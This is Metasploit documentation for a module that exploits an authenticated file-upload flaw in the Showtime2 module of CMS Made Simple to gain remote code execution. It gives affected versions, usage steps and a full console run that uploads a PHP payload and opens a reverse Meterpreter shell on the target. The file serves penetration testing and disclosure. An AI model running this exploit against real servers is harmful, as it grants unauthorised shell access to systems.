documentation/modules/exploit/multi/http/cmsms_showtime2_rce.md
This module exploits a File Upload vulnerability that lead in a RCE in Showtime2 module (<= 3.6.2) in CMS Made Simple (CMSMS). An authenticated user with "Use Showtime2" privilege could exploit the vulnerability.
The vulnerability exists in the Showtime2 module, where the class "class.showtime2_image.php" does not ensure that a watermark file has a standard image file extension (GIF, JPG, JPEG, or PNG).
Tested on Showtime2 3.6.2, 3.6.1, 3.6.0, 3.5.4, 3.5.3, 3.5.2, 3.5.1, 3.5.0, 3.4.5, 3.4.3, 3.4.2 on CMS Made Simple (CMSMS) 2.2.9.1 and 2.2.10
Affecting Showtime2 CMS Made Simple (CMSMS) module, version 3.6.2, 3.6.1, 3.6.0, 3.5.4, 3.5.3, 3.5.2, 3.5.1, 3.5.0, 3.4.5, 3.4.3, 3.4.2
msfconsoleuse exploit/multi/http/cmsms_showtime2_rceset RHOST <IP>set USERNAME <USERNAME>set PASSWORD <PASSWORD>checkThe target appears to be vulnerable.exploitmsf > use exploit/multi/http/cmsms_showtime2_rce
msf exploit(multi/http/cmsms_showtime2_rce) > set rhost target.com
rhost => target.com
msf exploit(multi/http/cmsms_showtime2_rce) > check
[*] Showtime2 version: 3.6.2
[*] 192.168.2.59:80 - The target appears to be vulnerable.
msf exploit(multi/http/cmsms_showtime2_rce) > set username Designer
username => Designer
msf exploit(multi/http/cmsms_showtime2_rce) > set password d3s1gn3r
password => d3s1gn3r
msf exploit(multi/http/cmsms_showtime2_rce) > exploit
[*] Started reverse TCP handler on 10.0.8.2:4444
[*] Showtime2 version: 3.6.2
[*] Uploading PHP payload.
[*] Making request for '/06wp7Fen.php' to execute payload.
[*] Sending stage (38247 bytes) to 192.168.2.59
[*] Meterpreter session 1 opened (10.0.8.2:4444 -> 192.168.2.59:59932) at 2019-03-19 23:27:07 +0100
[!] Tried to delete ./06wp7Fen.php, unknown result
meterpreter > getuid
Server username: www-data (33)
meterpreter > quit
[*] Shutting down Meterpreter...
[*] 192.168.2.59 - Meterpreter session 1 closed. Reason: User exit
msf exploit(multi/http/cmsms_showtime2_rce) >